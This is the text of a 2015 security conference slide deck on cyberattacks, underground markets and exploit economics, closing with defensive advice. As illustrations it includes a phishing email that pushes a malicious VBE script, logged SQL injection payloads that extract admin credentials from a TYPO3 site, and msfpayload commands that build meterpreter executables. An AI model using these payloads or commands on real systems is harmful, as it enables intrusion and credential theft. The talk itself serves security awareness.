ATTACKS LIES AND THE UNDERGROUND WORLD

BERLIN 02.11.2015 

Speaker: Andrea Pompili 

ATTACKS, LIES AND 

THE UNDERGROUND WORLD 

There are only 10 types 

of people in the world: 

Those who understand binary, 

and those who don't 

Page • ‹N› 

Except where otherwise noted, this work is licensed under 

http://creativecommons.org/licenses/by-nc-sa/3.0/ 

Andrea Pompili 

apompili@hotmail.com – Xilogic Corp.

BERLIN 02.11.2015 






BERLIN 02.11.2015 

« 

» 

> Full Remediation and Hardening done one year ago 

> Operative Systems Patched to the last available version 

> Full Logging of all Site’s activities 

> 2 IPS Systems (Intrusion Prevention System) in cascade 






BERLIN 02.11.2015 

10,00% 

8,60% 

6,80% 

6,80% 

5,70% 

6,10% 

34,70% 

28,90% 

31,70% 

34,10% 

34,10% 

27,20% 

55,30% 

62,50% 

61,50% 

59,10% 

60,20% 

66,70% 




Overall Attacks detected since 2009 

Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “OAI Report 2015” 



BERLIN 02.11.2015 

2,60% 

2,70% 

17,10% 

17,30% 

7,80% 

10,90% 

72,50% 

69,10% 




Detected Attack impacts 2013/2014 

Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “OAI Report 2015” 



BERLIN 02.11.2015 

«The purpose of this report is not detailing the results of the 

survey, but analyzing the data related to the average of the 

whole sample, we can establish that the results are: 

• quite good for the logical security; 

• very good for the infrastructure security; 

• good for the security related to services; 

• to be improved for organizational security. 

«We can say that we expected this» 






BERLIN 02.11.2015 






BERLIN 02.11.2015 






BERLIN 02.11.2015 

Russian Business Network 

ShadowCrew Avalanche 

Legion of Doom DarkMarket 

Masters of Deception 

Anton Gelonkin 

Leo Kuvayev 

The Silk Road CyberVor 

Sheep Marketplace 

Black Market Reloaded 

Evolution 

The Farmer’s Market 

Agora 

AlphaBay Market 

Lizard Squad 

419 Nigerian Scam 

Chinese Underground Market 




Source: Havocscope «Prices of Computer Hackers and Online Fraud» 



BERLIN 02.11.2015 

http://www.forbes.com/sites/andygreenberg/2012/03/23/shoppingfor-zero-days-an-price-list-for-hackers-secret-software-exploits/ 






BERLIN 02.11.2015 






BERLIN 02.11.2015 

Saturday, July 19, 1986 

Hacker Taps into Paris Computer 

Used in Space Study 


PAR I S — A hacker broke into 

sections of a powerful Americanbuilt 

computer that is used in 

French aerospace and other 

government research, officials 

said Friday. Jean-Claude Adan, 

deputy director of a Paris research 

center equipped with 



the advanced, $10-million Cray1 

computer, said the intruder 

cracked a computer entry code on 

March 30. 

He said a special inquiry showed 

that the break-in lasted up to four 

hours and had probably been 

achieved with an ordinary home 

or office terminal hooked to the 

center by phone. 

The center, which handles work 

for the National Office of 

Aerospace Research and other 

government bodies, is 

considering taking legal action. 

There was no immediate comment 

from Cray Research, based in 

Minneapolis. 

Adan said that tracing the culprit, 

thought to be a skilled technician 

familiar with the Cray system, 

was extremely difficult because 

of the large number of home 

terminals. 



BERLIN 02.11.2015 

« » 


http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/ 





BERLIN 02.11.2015 






BERLIN 02.11.2015 

(*) According to Frank Rieger 

Chief technology officer at GSMK 






BERLIN 02.11.2015 

Source: Vincenzo Iozzo – OWASP Day 2012 






BERLIN 02.11.2015 

Source: Vincenzo Iozzo – OWASP Day 2012 






BERLIN 02.11.2015 

So, how does one get full remote code execution in Chrome? In the case of 

Pinkie Pie’s exploit, it took a chain of Six Different Bugs in order to 

successfully break out of the Chrome sandbox. 

(http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html) 

Last year (2011), VUPEN released a video to demonstrate a 

successful sandbox escape against Chrome but Google challenged 

the validity of that hack, claiming it exploited third-party code, 

believed to be the Adobe Flash plugin. 

(http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browsersandbox-first-to-fall/10588) 






BERLIN 02.11.2015 

Blackole Exploit Kit 

Neutrino 






BERLIN 02.11.2015 






BERLIN 02.11.2015 






BERLIN 02.11.2015 

http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf 






BERLIN 02.11.2015 






BERLIN 02.11.2015 






BERLIN 02.11.2015 

From: hdesk@rcs.it 

Sent: Thursday, November 04, 2004 7:48 PM 

To: xxxxxx@rcs.it 

Subject: Configuration Update 

Good morning, 

you’re receiving this email because we’ve detected some troubles in your email account. These seems related 

to an uncorrect configuration of Your computer that need to be updated. 

Please connect to the following address to begin the update process: 

http://xxxx.rcs.it/software/av/index.html 

Please execute the auto-configuration script Configuration.vbe, which link is available at the intranet page 

specified above. Once the configuration has been concluded, a confirmation message will be prompted 

specifying the positive update execution. 

Kind Regards 

Help Desk – RCS Technical Support Team 

RCS Editori S.p.A. 






BERLIN 02.11.2015 

Configuration has been correctly updated, thanks for collaboration 






BERLIN 02.11.2015 






BERLIN 02.11.2015 






BERLIN 02.11.2015 






BERLIN 02.11.2015 

173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] 

"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0" 

178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] 

"GET /index.php?id=2501&tx_wfqbe_pi1[uid]= 

1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a, 

substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64), 

floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+” 






BERLIN 02.11.2015 

89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] 

"GET /some_path/some_file.html?tx_wfqbe_pi1[uid]= 

11502+and(select+1+from(select+count(*),concat_ws(0x3a, 

substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin), 

repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor( 

rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" 

"Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10" 

Web Shell Extension 






BERLIN 02.11.2015 

http://evader.stonesoft.com/ 

http://insecure.org/stf/secnet_ids/secnet_ids.html 






BERLIN 02.11.2015 

msfpayload windows/meterpreter/bind_tcp X > 

moca_x86_tcp_4444.exe 






BERLIN 02.11.2015 

msfpayload windows/x64/meterpreter/bind_tcp X > 

moca_x64_tcp_4444.exe 






BERLIN 02.11.2015 

“The truth is, consumer-grade antivirus products can’t 

protect against targeted malware created by wellresourced 

nation-states with bulging budgets. 

They can protect you against run-of-the-mill malware: 

banking trojans, keystroke loggers and e-mail worms. 

But targeted attacks like these go to great lengths to 

avoid antivirus products on purpose” 






BERLIN 02.11.2015 

Think like an Attacker so that you can understand 

what they’ll do and how they will attack 

Try to understand their targets, their abilities, but above 

all the operational constaints they have 

Identify the «perceived» value of the things you want to 

protect but, most importantly, what you want to protect 

Work on all the defense perimeter, without any act of faith 

If your defense is cheaper than the attack, you’ll always 

be in the lead 






BERLIN 02.11.2015 






BERLIN 02.11.2015 

Questions? 

English 

¿Preguntas? 

Spanish 

مَطَالِب أَيَّة 

Arabic 

Ερωτήσεις? 

Greek 

Domande? 

Italian 

вопросы? 

Russian 

Sindarin 

tupoQghachmey 

Klingon 

Japanese

ATTACKS LIES AND THE UNDERGROUND WORLD

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?